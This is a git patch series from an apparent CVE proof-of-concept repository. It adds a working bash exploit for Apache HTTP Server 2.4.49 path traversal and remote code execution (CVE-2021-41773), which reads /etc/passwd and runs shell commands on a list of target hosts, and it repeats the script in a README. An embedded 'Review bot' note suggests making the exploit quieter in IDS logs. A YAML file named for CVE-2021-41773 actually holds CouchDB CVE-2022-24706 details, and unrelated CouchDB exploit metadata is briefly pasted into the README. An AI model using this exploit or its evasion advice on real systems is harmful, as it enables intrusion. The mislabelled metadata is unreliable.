From 4213602c4235c25e5544243bbca7966c0992f7bc Mon Sep 17 00:00:00 2001
From: fanyunpeng
Date: Wed, 15 Mar 2023 09:15:01 +0000
Subject: [PATCH 01/54] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20apache-HTTP=20Server?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 cve/apache-HTTP Server/.keep | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 create mode 100644 cve/apache-HTTP Server/.keep

diff --git a/cve/apache-HTTP Server/.keep b/cve/apache-HTTP Server/.keep
new file mode 100644
index 00000000..e69de29b
-- 
Gitee

From 38a12e3f8c8f2abe6cbde87eeefe9cce5a30cd51 Mon Sep 17 00:00:00 2001
From: fanyunpeng
Date: Wed, 15 Mar 2023 09:16:12 +0000
Subject: [PATCH 02/54] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?=
 =?UTF-8?q?e/apache-HTTP=20Server/.keep?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 cve/apache-HTTP Server/.keep | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 delete mode 100644 cve/apache-HTTP Server/.keep

diff --git a/cve/apache-HTTP Server/.keep b/cve/apache-HTTP Server/.keep
deleted file mode 100644
index e69de29b..00000000
-- 
Gitee

From 9e96389deecd9afbbaa0fccf68999540a4e00549 Mon Sep 17 00:00:00 2001
From: fanyunpeng
Date: Wed, 15 Mar 2023 09:16:30 +0000
Subject: [PATCH 03/54] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20apache-HTTP=20Server?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 cve/apache-HTTP Server/.keep | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 create mode 100644 cve/apache-HTTP Server/.keep

diff --git a/cve/apache-HTTP Server/.keep b/cve/apache-HTTP Server/.keep
new file mode 100644
index 00000000..e69de29b
-- 
Gitee

From 93b3d1389d339201dc6fa4fd85c09c816adade57 Mon Sep 17 00:00:00 2001
From: fanyunpeng
Date: Wed, 15 Mar 2023 09:29:04 +0000
Subject: [PATCH 04/54] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2021-42013?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 cve/apache-HTTP Server/CVE-2021-42013/.keep | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 create mode 100644 cve/apache-HTTP Server/CVE-2021-42013/.keep

diff --git a/cve/apache-HTTP Server/CVE-2021-42013/.keep b/cve/apache-HTTP Server/CVE-2021-42013/.keep
new file mode 100644
index 00000000..e69de29b
-- 
Gitee

From 6f4187bc305d4417e1019018ed2fc79427d7816a Mon Sep 17 00:00:00 2001
From: fanyunpeng
Date: Wed, 15 Mar 2023 09:29:56 +0000
Subject: [PATCH 05/54] =?UTF-8?q?=E6=96=B0=E5=BB=BA=202021?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 cve/apache-HTTP Server/2021/.keep | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 create mode 100644 cve/apache-HTTP Server/2021/.keep

diff --git a/cve/apache-HTTP Server/2021/.keep b/cve/apache-HTTP Server/2021/.keep
new file mode 100644
index 00000000..e69de29b
-- 
Gitee

From ea6c8e0de35a545b12b387e5c575cb325d37d044 Mon Sep 17 00:00:00 2001
From: fanyunpeng
Date: Wed, 15 Mar 2023 09:30:06 +0000
Subject: [PATCH 06/54] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?=
 =?UTF-8?q?e/apache-HTTP=20Server/CVE-2021-42013?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 cve/apache-HTTP Server/CVE-2021-42013/.keep | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 delete mode 100644 cve/apache-HTTP Server/CVE-2021-42013/.keep

diff --git a/cve/apache-HTTP Server/CVE-2021-42013/.keep b/cve/apache-HTTP Server/CVE-2021-42013/.keep
deleted file mode 100644
index e69de29b..00000000
-- 
Gitee

From 2ae05ea337a87b5ea52b4b3acd04882bab8989dd Mon Sep 17 00:00:00 2001
From: fanyunpeng
Date: Wed, 15 Mar 2023 09:30:13 +0000
Subject: [PATCH 07/54] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2021-42013?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 cve/apache-HTTP Server/2021/CVE-2021-42013/.keep | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 create mode 100644 cve/apache-HTTP Server/2021/CVE-2021-42013/.keep

diff --git a/cve/apache-HTTP Server/2021/CVE-2021-42013/.keep b/cve/apache-HTTP Server/2021/CVE-2021-42013/.keep
new file mode 100644
index 00000000..e69de29b
-- 
Gitee

From 435232ab39ea7a2083ffdcdb0a1ab9923f646437 Mon Sep 17 00:00:00 2001
From: fanyunpeng
Date: Wed, 15 Mar 2023 09:30:44 +0000
Subject: [PATCH 08/54] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20yaml?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 cve/apache-HTTP Server/2021/yaml/.keep | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 create mode 100644 cve/apache-HTTP Server/2021/yaml/.keep

diff --git a/cve/apache-HTTP Server/2021/yaml/.keep b/cve/apache-HTTP Server/2021/yaml/.keep
new file mode 100644
index 00000000..e69de29b
-- 
Gitee

From afc9907669e68e28463c514d67cf54c04ada7fec Mon Sep 17 00:00:00 2001
From: fanyunpeng
Date: Wed, 15 Mar 2023 09:30:58 +0000
Subject: [PATCH 09/54] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?=
 =?UTF-8?q?e/apache-HTTP=20Server/2021/.keep?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 cve/apache-HTTP Server/2021/.keep | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 delete mode 100644 cve/apache-HTTP Server/2021/.keep

diff --git a/cve/apache-HTTP Server/2021/.keep b/cve/apache-HTTP Server/2021/.keep
deleted file mode 100644
index e69de29b..00000000
-- 
Gitee

From 4e9c383a414dbcdd3e79619a20a2e477a8908bae Mon Sep 17 00:00:00 2001
From: fanyunpeng
Date: Wed, 15 Mar 2023 09:31:09 +0000
Subject: [PATCH 10/54] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?=
 =?UTF-8?q?e/apache-HTTP=20Server/.keep?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 cve/apache-HTTP Server/.keep | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 delete mode 100644 cve/apache-HTTP Server/.keep

diff --git a/cve/apache-HTTP Server/.keep b/cve/apache-HTTP Server/.keep
deleted file mode 100644
index e69de29b..00000000
-- 
Gitee

From cd532a6f0aaff97b77241eb8ed3dae27f2642f06 Mon Sep 17 00:00:00 2001
From: fanyunpeng
Date: Thu, 16 Mar 2023 06:26:56 +0000
Subject: [PATCH 11/54] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?=
 =?UTF-8?q?e/apache-HTTP=20Server/2021/CVE-2021-42013/.keep?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 cve/apache-HTTP Server/2021/CVE-2021-42013/.keep | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 delete mode 100644 cve/apache-HTTP Server/2021/CVE-2021-42013/.keep

diff --git a/cve/apache-HTTP Server/2021/CVE-2021-42013/.keep b/cve/apache-HTTP Server/2021/CVE-2021-42013/.keep
deleted file mode 100644
index e69de29b..00000000
-- 
Gitee

From 3fcc712be0c8f4454bcdfd3408402617478f97a7 Mon Sep 17 00:00:00 2001
From: fanyunpeng
Date: Thu, 16 Mar 2023 06:34:15 +0000
Subject: [PATCH 12/54] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2021-41773?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 cve/apache-HTTP Server/2021/CVE-2021-41773/.keep | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 create mode 100644 cve/apache-HTTP Server/2021/CVE-2021-41773/.keep

diff --git a/cve/apache-HTTP Server/2021/CVE-2021-41773/.keep b/cve/apache-HTTP Server/2021/CVE-2021-41773/.keep
new file mode 100644
index 00000000..e69de29b
-- 
Gitee

From 3f2c2f39c9cd387af1944663a58b9d98b93a979c Mon Sep 17 00:00:00 2001
From: fanyunpeng
Date: Thu, 16 Mar 2023 06:35:48 +0000
Subject: [PATCH 13/54] poc

Signed-off-by: fanyunpeng
---
 .../2021/CVE-2021-41773/CVE-2021-41773.sh | 22 +++++++++++++++++++
 1 file changed, 22 insertions(+)
 create mode 100644 cve/apache-HTTP Server/2021/CVE-2021-41773/CVE-2021-41773.sh

diff --git a/cve/apache-HTTP Server/2021/CVE-2021-41773/CVE-2021-41773.sh b/cve/apache-HTTP Server/2021/CVE-2021-41773/CVE-2021-41773.sh
new file mode 100644
index 00000000..2546e270
--- /dev/null
+++ b/cve/apache-HTTP Server/2021/CVE-2021-41773/CVE-2021-41773.sh
@@ -0,0 +1,22 @@
+# Exploit Title: Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE)
+# Date: 10/05/2021
+# Exploit Author: Lucas Souza https://lsass.io
+# Vendor Homepage: https://apache.org/
+# Version: 2.4.49
+# Tested on: 2.4.49
+# CVE : CVE-2021-41773
+# Credits: Ash Daulton and the cPanel Security Team
+
+#!/bin/bash
+
+if [[ $1 == '' ]]; [[ $2 == '' ]]; then
+echo Set [TAGET-LIST.TXT] [PATH] [COMMAND]
+echo ./PoC.sh targets.txt /etc/passwd
+exit
+fi
+for host in $(cat $1); do
+echo $host
+curl -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"; done
+
+# PoC.sh targets.txt /etc/passwd
+# PoC.sh targets.txt /bin/sh whoami
\ No newline at end of file
-- 
Gitee

From fe88a3d57229cc98a8333aa73376bf2ce569bf56 Mon Sep 17 00:00:00 2001
From: fanyunpeng
Date: Thu, 16 Mar 2023 06:35:55 +0000
Subject: [PATCH 14/54] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?=
 =?UTF-8?q?e/apache-HTTP=20Server/2021/CVE-2021-41773/.keep?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 cve/apache-HTTP Server/2021/CVE-2021-41773/.keep | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 delete mode 100644 cve/apache-HTTP Server/2021/CVE-2021-41773/.keep
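Review bot: The argument check `if [[ $1 == '' ]]; [[ $2 == '' ]]; then` does not test both arguments — the `;` ends the first `[[` as a standalone command, so only an empty `$2` reaches the usage text and a missing target list falls through to `cat` on an empty name; `if [[ -z $1 || -z $2 ]]; then` is what was meant. The `#!/bin/bash` line sits after the comment header rather than on line 1, so `./CVE-2021-41773.sh` is run by whatever the caller's `/bin/sh` is, where `[[` is not guaranteed to exist. The `-d` body is sent on every request, so even the read-only `/etc/passwd` check issues a POST carrying a shell payload; passing `-d` only when `$3` is set would keep file-read checks passive and less noisy in server and IDS logs. A header comment should also state the preconditions the script silently assumes: traversal only reaches paths not covered by `Require all denied`, command execution additionally needs mod_cgi/mod_cgid enabled, and the single `%2e` encoding used here targets 2.4.49 only — 2.4.50's incomplete fix (CVE-2021-42013, for which this series creates a directory) requires a different encoding, so a negative result from this script does not clear a 2.4.50 host.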
diff --git a/cve/apache-HTTP Server/2021/CVE-2021-41773/.keep b/cve/apache-HTTP Server/2021/CVE-2021-41773/.keep
deleted file mode 100644
index e69de29b..00000000
-- 
Gitee

From f2e5ac77cef8389ee1e99d8297f7b4b78ec39488 Mon Sep 17 00:00:00 2001
From: fanyunpeng
Date: Thu, 16 Mar 2023 06:38:18 +0000
Subject: [PATCH 15/54] add cve/apache-HTTP Server/2021/CVE-2021-41773/README.md.

Signed-off-by: fanyunpeng
---
 .../2021/CVE-2021-41773/README.md | 22 +++++++++++++++++++
 1 file changed, 22 insertions(+)
 create mode 100644 cve/apache-HTTP Server/2021/CVE-2021-41773/README.md

diff --git a/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md b/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md
new file mode 100644
index 00000000..2546e270
--- /dev/null
+++ b/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md
@@ -0,0 +1,22 @@
+# Exploit Title: Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE)
+# Date: 10/05/2021
+# Exploit Author: Lucas Souza https://lsass.io
+# Vendor Homepage: https://apache.org/
+# Version: 2.4.49
+# Tested on: 2.4.49
+# CVE : CVE-2021-41773
+# Credits: Ash Daulton and the cPanel Security Team
+
+#!/bin/bash
+
+if [[ $1 == '' ]]; [[ $2 == '' ]]; then
+echo Set [TAGET-LIST.TXT] [PATH] [COMMAND]
+echo ./PoC.sh targets.txt /etc/passwd
+exit
+fi
+for host in $(cat $1); do
+echo $host
+curl -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"; done
+
+# PoC.sh targets.txt /etc/passwd
+# PoC.sh targets.txt /bin/sh whoami
\ No newline at end of file
-- 
Gitee

From 2688f7daaa0e7847d2430e01e3ece5bb9cdc50fd Mon Sep 17 00:00:00 2001
From: fanyunpeng
Date: Thu, 16 Mar 2023 06:39:49 +0000
Subject: [PATCH 16/54] update cve/apache-HTTP Server/2021/CVE-2021-41773/README.md.

Signed-off-by: fanyunpeng
---
 .../2021/CVE-2021-41773/README.md | 16 ++++++++--------
 1 file changed, 8 insertions(+), 8 deletions(-)
diff --git a/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md b/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md
index 2546e270..982a529a 100644
--- a/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md
+++ b/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md
@@ -1,11 +1,11 @@
-# Exploit Title: Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE)
-# Date: 10/05/2021
-# Exploit Author: Lucas Souza https://lsass.io
-# Vendor Homepage: https://apache.org/
-# Version: 2.4.49
-# Tested on: 2.4.49
-# CVE : CVE-2021-41773
-# Credits: Ash Daulton and the cPanel Security Team
+Exploit Title: Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE)
+Date: 10/05/2021
+Exploit Author: Lucas Souza https://lsass.io
+Vendor Homepage: https://apache.org/
+Version: 2.4.49
+Tested on: 2.4.49
+CVE : CVE-2021-41773
+Credits: Ash Daulton and the cPanel Security Team
 
 #!/bin/bash
 
-- 
Gitee

From 1dba8a2213f149666fe292d079ccd0798b67ac7c Mon Sep 17 00:00:00 2001
From: fanyunpeng
Date: Thu, 16 Mar 2023 06:40:35 +0000
Subject: [PATCH 17/54] update cve/apache-HTTP Server/2021/CVE-2021-41773/README.md.

Signed-off-by: fanyunpeng
---
 .../2021/CVE-2021-41773/README.md | 27 ++++++++++++++++++-
 1 file changed, 26 insertions(+), 1 deletion(-)

diff --git a/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md b/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md
index 982a529a..0deb5b5f 100644
--- a/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md
+++ b/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md
@@ -19,4 +19,29 @@ echo $host
 curl -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"; done
 
 # PoC.sh targets.txt /etc/passwd
-# PoC.sh targets.txt /bin/sh whoami
\ No newline at end of file
+# PoC.sh targets.txt /bin/sh whoami
+Date: 2022-01-21
+
+Exploit Author: Konstantin Burov, @_sadshade
+
+Software Link: https://couchdb.apache.org/
+
+Version: 3.2.1 and below
+
+Tested on: Kali 2021.2
+
+Based on 1F98D's Erlang Cookie - Remote Code Execution
+
+Shodan: port:4369 "name couchdb at"
+
+CVE: CVE-2022-24706
+
+References:
+
+https://habr.com/ru/post/661195/
+
+https://www.exploit-db.com/exploits/49418
+
+https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/
+
+https://book.hacktricks.xyz/pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd#erlang-cookie-rce
\ No newline at end of file
-- 
Gitee

From 88593c465903ceb74accaf90aceaf3923b4fbdf1 Mon Sep 17 00:00:00 2001
From: fanyunpeng
Date: Thu, 16 Mar 2023 06:41:16 +0000
Subject: [PATCH 18/54] update cve/apache-HTTP Server/2021/CVE-2021-41773/README.md.

Signed-off-by: fanyunpeng
---
 .../2021/CVE-2021-41773/README.md | 29 ++-----------------
 1 file changed, 3 insertions(+), 26 deletions(-)

diff --git a/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md b/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md
index 0deb5b5f..20e956c4 100644
--- a/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md
+++ b/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md
@@ -17,31 +17,8 @@ fi
 for host in $(cat $1); do
 echo $host
 curl -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"; done
+#Usage
+PoC.sh targets.txt /etc/passwd
+PoC.sh targets.txt /bin/sh whoami
 
-# PoC.sh targets.txt /etc/passwd
-# PoC.sh targets.txt /bin/sh whoami
-Date: 2022-01-21
 
-Exploit Author: Konstantin Burov, @_sadshade
-
-Software Link: https://couchdb.apache.org/
-
-Version: 3.2.1 and below
-
-Tested on: Kali 2021.2
-
-Based on 1F98D's Erlang Cookie - Remote Code Execution
-
-Shodan: port:4369 "name couchdb at"
-
-CVE: CVE-2022-24706
-
-References:
-
-https://habr.com/ru/post/661195/
-
-https://www.exploit-db.com/exploits/49418
-
-https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/
-
-https://book.hacktricks.xyz/pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd#erlang-cookie-rce
\ No newline at end of file
-- 
Gitee

From 4e36553d895c87fc7925380c3a29c3fce9ac8570 Mon Sep 17 00:00:00 2001
From: fanyunpeng
Date: Thu, 16 Mar 2023 06:43:22 +0000
Subject: [PATCH 19/54] update cve/apache-HTTP Server/2021/CVE-2021-41773/README.md.

Signed-off-by: fanyunpeng
---
 cve/apache-HTTP Server/2021/CVE-2021-41773/README.md | 1 +
 1 file changed, 1 insertion(+)

diff --git a/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md b/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md
index 20e956c4..40f62d2a 100644
--- a/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md
+++ b/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md
@@ -1,3 +1,4 @@
+#Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE)
 Exploit Title: Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE)
 Date: 10/05/2021
 Exploit Author: Lucas Souza https://lsass.io
-- 
Gitee

From 9576c0b5b9f20ac30897af7d072c684b19d357d3 Mon Sep 17 00:00:00 2001
From: fanyunpeng
Date: Thu, 16 Mar 2023 06:44:34 +0000
Subject: [PATCH 20/54] update cve/apache-HTTP Server/2021/CVE-2021-41773/README.md.

Signed-off-by: fanyunpeng
---
 .../2021/CVE-2021-41773/README.md | 18 +++++++++---------
 1 file changed, 9 insertions(+), 9 deletions(-)

diff --git a/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md b/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md
index 40f62d2a..76e6e842 100644
--- a/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md
+++ b/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md
@@ -1,12 +1,12 @@
-#Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE)
-Exploit Title: Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE)
-Date: 10/05/2021
-Exploit Author: Lucas Souza https://lsass.io
-Vendor Homepage: https://apache.org/
-Version: 2.4.49
-Tested on: 2.4.49
-CVE : CVE-2021-41773
-Credits: Ash Daulton and the cPanel Security Team
+#Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE)
+Exploit Title: Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE)
+Date: 10/05/2021
+Exploit Author: Lucas Souza https://lsass.io
+Vendor Homepage: https://apache.org/
+Version: 2.4.49
+Tested on: 2.4.49
+CVE : CVE-2021-41773
+Credits: Ash Daulton and the cPanel Security Team
 
 #!/bin/bash
 
-- 
Gitee

From 69b37a7afa77aaa8a228182447709bc94159552d Mon Sep 17 00:00:00 2001
From: fanyunpeng
Date: Thu, 16 Mar 2023 06:45:17 +0000
Subject: [PATCH 21/54] update cve/apache-HTTP Server/2021/CVE-2021-41773/README.md.

Signed-off-by: fanyunpeng
---
 cve/apache-HTTP Server/2021/CVE-2021-41773/README.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md b/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md
index 76e6e842..a66265ee 100644
--- a/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md
+++ b/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md
@@ -1,4 +1,4 @@
-#Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE)
+# Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE)
 Exploit Title: Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE)
 Date: 10/05/2021
 Exploit Author: Lucas Souza https://lsass.io
-- 
Gitee

From aae94fd447055ac924d313724da6a93a5ee46642 Mon Sep 17 00:00:00 2001
From: fanyunpeng
Date: Thu, 16 Mar 2023 06:47:10 +0000
Subject: [PATCH 22/54] update cve/apache-HTTP Server/2021/CVE-2021-41773/README.md.

Signed-off-by: fanyunpeng
---
 cve/apache-HTTP Server/2021/CVE-2021-41773/README.md | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md b/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md
index a66265ee..f3ec5ea1 100644
--- a/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md
+++ b/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md
@@ -7,7 +7,7 @@ Version: 2.4.49
 Tested on: 2.4.49
 CVE : CVE-2021-41773
 Credits: Ash Daulton and the cPanel Security Team
-
+``
 #!/bin/bash
 
 if [[ $1 == '' ]]; [[ $2 == '' ]]; then
@@ -18,6 +18,7 @@ fi
 for host in $(cat $1); do
 echo $host
 curl -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"; done
+``
 #Usage
 PoC.sh targets.txt /etc/passwd
 PoC.sh targets.txt /bin/sh whoami
-- 
Gitee

From 2ee7f970e46a45ec383b173ffa489e4c63bf7d70 Mon Sep 17 00:00:00 2001
From: fanyunpeng
Date: Thu, 16 Mar 2023 06:47:31 +0000
Subject: [PATCH 23/54] update cve/apache-HTTP Server/2021/CVE-2021-41773/README.md.

Signed-off-by: fanyunpeng
---
 cve/apache-HTTP Server/2021/CVE-2021-41773/README.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md b/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md
index f3ec5ea1..b4f2d065 100644
--- a/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md
+++ b/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md
@@ -19,7 +19,7 @@ for host in $(cat $1); do
 echo $host
 curl -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"; done
 ``
-#Usage
+# Usage
 PoC.sh targets.txt /etc/passwd
 PoC.sh targets.txt /bin/sh whoami
 
-- 
Gitee

From 842efb59a95b833e389d0a85f5ccadabe175ab94 Mon Sep 17 00:00:00 2001
From: fanyunpeng
Date: Thu, 16 Mar 2023 06:48:49 +0000
Subject: [PATCH 24/54] update cve/apache-HTTP Server/2021/CVE-2021-41773/README.md.

Signed-off-by: fanyunpeng
---
 cve/apache-HTTP Server/2021/CVE-2021-41773/README.md | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md b/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md
index b4f2d065..a60daadb 100644
--- a/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md
+++ b/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md
@@ -7,7 +7,7 @@ Version: 2.4.49
 Tested on: 2.4.49
 CVE : CVE-2021-41773
 Credits: Ash Daulton and the cPanel Security Team
-``
+```
 #!/bin/bash
 
 if [[ $1 == '' ]]; [[ $2 == '' ]]; then
@@ -18,7 +18,7 @@ fi
 for host in $(cat $1); do
 echo $host
 curl -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"; done
-``
+```
 # Usage
 PoC.sh targets.txt /etc/passwd
 PoC.sh targets.txt /bin/sh whoami
-- 
Gitee

From 5cd7861bf43b7ad30133f10e64dbe0f76affcd93 Mon Sep 17 00:00:00 2001
From: fanyunpeng
Date: Thu, 16 Mar 2023 06:49:51 +0000
Subject: [PATCH 25/54] update cve/apache-HTTP Server/2021/CVE-2021-41773/README.md.

Signed-off-by: fanyunpeng
---
 cve/apache-HTTP Server/2021/CVE-2021-41773/README.md | 7 ++++---
 1 file changed, 4 insertions(+), 3 deletions(-)

diff --git a/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md b/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md
index a60daadb..d4d61313 100644
--- a/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md
+++ b/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md
@@ -20,7 +20,8 @@ echo $host
 curl -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"; done
 ```
 # Usage
-PoC.sh targets.txt /etc/passwd
-PoC.sh targets.txt /bin/sh whoami
-
+```
+PoC.sh targets.txt /etc/passwd
+PoC.sh targets.txt /bin/sh whoami
+```
 
-- 
Gitee

From 10b19121b5b8a09237a43aedc03f8be872cdb6ac Mon Sep 17 00:00:00 2001
From: fanyunpeng
Date: Thu, 16 Mar 2023 06:52:38 +0000
Subject: [PATCH 26/54] add cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml.

Signed-off-by: fanyunpeng
---
 .../2021/yaml/CVE-2021-41773.yaml | 32 +++++++++++++++++++
 1 file changed, 32 insertions(+)
 create mode 100644 cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml

diff --git a/cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml b/cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml
new file mode 100644
index 00000000..50fd5093
--- /dev/null
+++ b/cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml
@@ -0,0 +1,32 @@
+id: CVE-2022-24706
+source: https://github.com/sadshade/CVE-2022-24706-CouchDB-Exploit
+info:
+ name: Apache CouchDB 是一个面向文档的数据库管理系统。
+ severity: critical
+ description:
+ 当CouchDB 以集群模式安装时,会开启epmd服务,并且监听相应端口。由于在默认安装过程中Apache CouchDB 将 Erlang Cookie默认设置为 monster,若未经修改,则攻击者可利用该cookie连接epmd,在知道fqdn的情况下执行任意代码,控制服务器。
+ scope-of-influence:
+ apache-CouchDB < 3.2.2
+ reference:
+ - http://packetstormsecurity.com/files/167032/Apache-CouchDB-3.2.1-Remote-Code-...
+ - http://packetstormsecurity.com/files/169702/Apache-CouchDB-Erlang-Remote-Code...
+ - http://www.openwall.com/lists/oss-security/2022/04/26/1
+ - http://www.openwall.com/lists/oss-security/2022/05/09/1
+ - http://www.openwall.com/lists/oss-security/2022/05/09/2
